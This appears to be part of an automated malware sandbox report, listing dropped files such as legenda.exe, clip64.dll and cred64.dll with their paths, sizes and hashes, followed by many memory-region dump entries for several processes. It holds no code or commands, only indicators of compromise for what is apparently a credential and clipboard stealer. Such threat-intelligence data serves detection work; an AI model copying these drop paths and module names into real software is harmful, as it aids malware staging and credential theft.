                          5086db99de54fca268169a1c6cf26122

                          SHA1

                          003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                          SHA256

                          42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                          SHA512

                          90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                        • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                          Filesize

                          235KB

                          MD5

                          5086db99de54fca268169a1c6cf26122

                          SHA1

                          003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                          SHA256

                          42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                          SHA512

                          90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                          Filesize

                          89KB

                          MD5

                          16cf28ebb6d37dbaba93f18320c6086e

                          SHA1

                          eae7d4b7a9636329065877aabe8d4f721a26ab25

                          SHA256

                          c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

                          SHA512

                          f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

                        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                          Filesize

                          89KB

                          MD5

                          16cf28ebb6d37dbaba93f18320c6086e

                          SHA1

                          eae7d4b7a9636329065877aabe8d4f721a26ab25

                          SHA256

                          c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

                          SHA512

                          f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

                        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                          Filesize

                          89KB

                          MD5

                          16cf28ebb6d37dbaba93f18320c6086e

                          SHA1

                          eae7d4b7a9636329065877aabe8d4f721a26ab25

                          SHA256

                          c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

                          SHA512

                          f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

                        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
                          Filesize

                          223B

                          MD5

                          94cbeec5d4343918fd0e48760e40539c

                          SHA1

                          a049266c5c1131f692f306c8710d7e72586ae79d

                          SHA256

                          48eb3ca078da2f5e9fd581197ae1b4dfbac6d86040addbb305e305c014741279

                          SHA512

                          4e92450333d60b1977f75c240157a8589cfb1c80a979fbe0793cc641e13556004e554bc6f9f4853487dbcfcdc2ca93afe610649e9712e91415ed3f2a60d4fec0

                        • memory/452-201-0x0000000002820000-0x0000000002830000-memory.dmp
                          Filesize

                          64KB

                        • memory/452-169-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-190-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-184-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-186-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-192-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-194-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-199-0x0000000000400000-0x0000000000834000-memory.dmp
                          Filesize

                          4.2MB

                        • memory/452-202-0x0000000002820000-0x0000000002830000-memory.dmp
                          Filesize

                          64KB

                        • memory/452-182-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-198-0x0000000002820000-0x0000000002830000-memory.dmp
                          Filesize

                          64KB

                        • memory/452-197-0x0000000002820000-0x0000000002830000-memory.dmp
                          Filesize

                          64KB

                        • memory/452-178-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-176-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-174-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-172-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-170-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-180-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-168-0x0000000004FC0000-0x0000000005564000-memory.dmp
                          Filesize

                          5.6MB

                        • memory/452-167-0x0000000000840000-0x000000000086D000-memory.dmp
                          Filesize

                          180KB

                        • memory/452-188-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/452-204-0x0000000000400000-0x0000000000834000-memory.dmp
                          Filesize

                          4.2MB

                        • memory/452-203-0x0000000002820000-0x0000000002830000-memory.dmp
                          Filesize

                          64KB

                        • memory/452-196-0x0000000002A90000-0x0000000002AA2000-memory.dmp
                          Filesize

                          72KB

                        • memory/672-1238-0x000001CC787E0000-0x000001CC787F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/672-1243-0x000001CC787E0000-0x000001CC787F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/672-1244-0x000001CC787E0000-0x000001CC787F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/672-1247-0x000001CC787E0000-0x000001CC787F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/672-1228-0x000001CC79610000-0x000001CC79632000-memory.dmp
                          Filesize

                          136KB

                        • memory/1684-1142-0x0000000004B50000-0x0000000004B60000-memory.dmp
                          Filesize

                          64KB

                        • memory/1684-1141-0x0000000004B50000-0x0000000004B60000-memory.dmp
                          Filesize

                          64KB

                        • memory/1684-1140-0x0000000000130000-0x0000000000162000-memory.dmp
                          Filesize

                          200KB

                        • memory/2080-161-0x0000000000EE0000-0x0000000000EEA000-memory.dmp
                          Filesize

                          40KB

                        • memory/2668-1175-0x0000000000290000-0x00000000002EA000-memory.dmp
                          Filesize

                          360KB

                        • memory/2668-1176-0x0000000004B60000-0x0000000004B70000-memory.dmp
                          Filesize

                          64KB

                        • memory/3156-1248-0x0000013272680000-0x0000013272690000-memory.dmp
                          Filesize

                          64KB

                        • memory/3156-1246-0x0000013272680000-0x0000013272690000-memory.dmp
                          Filesize

                          64KB

                        • memory/3156-1245-0x0000013272680000-0x0000013272690000-memory.dmp
                          Filesize

                          64KB

                        • memory/3156-1241-0x0000013272680000-0x0000013272690000-memory.dmp
                          Filesize

                          64KB

                        • memory/3156-1240-0x0000013272680000-0x0000013272690000-memory.dmp
                          Filesize

                          64KB

                        • memory/3156-1239-0x0000013272680000-0x0000013272690000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1122-0x0000000005C50000-0x0000000005C8C000-memory.dmp
                          Filesize

                          240KB

                        • memory/5052-227-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1124-0x0000000005F40000-0x0000000005FA6000-memory.dmp
                          Filesize

                          408KB

                        • memory/5052-1123-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1134-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1121-0x0000000005C30000-0x0000000005C42000-memory.dmp
                          Filesize

                          72KB

                        • memory/5052-1120-0x0000000005AF0000-0x0000000005BFA000-memory.dmp
                          Filesize

                          1.0MB

                        • memory/5052-1119-0x0000000005480000-0x0000000005A98000-memory.dmp
                          Filesize

                          6.1MB

                        • memory/5052-1126-0x0000000006920000-0x0000000006996000-memory.dmp
                          Filesize

                          472KB

                        • memory/5052-246-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-244-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-242-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-240-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-238-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-236-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-234-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-232-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-230-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-228-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-1125-0x0000000006730000-0x00000000067C2000-memory.dmp
                          Filesize

                          584KB

                        • memory/5052-224-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-1127-0x00000000069B0000-0x0000000006A00000-memory.dmp
                          Filesize

                          320KB

                        • memory/5052-1129-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1130-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-225-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-220-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-1131-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1132-0x0000000006B70000-0x0000000006D32000-memory.dmp
                          Filesize

                          1.8MB

                        • memory/5052-223-0x0000000004E80000-0x0000000004E90000-memory.dmp
                          Filesize

                          64KB

                        • memory/5052-1133-0x0000000006D40000-0x000000000726C000-memory.dmp
                          Filesize

                          5.2MB

                        • memory/5052-221-0x0000000000A90000-0x0000000000ADB000-memory.dmp
                          Filesize

                          300KB

                        • memory/5052-218-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-216-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-214-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-212-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-210-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB

                        • memory/5052-209-0x0000000005440000-0x000000000547E000-memory.dmp
                          Filesize

                          248KB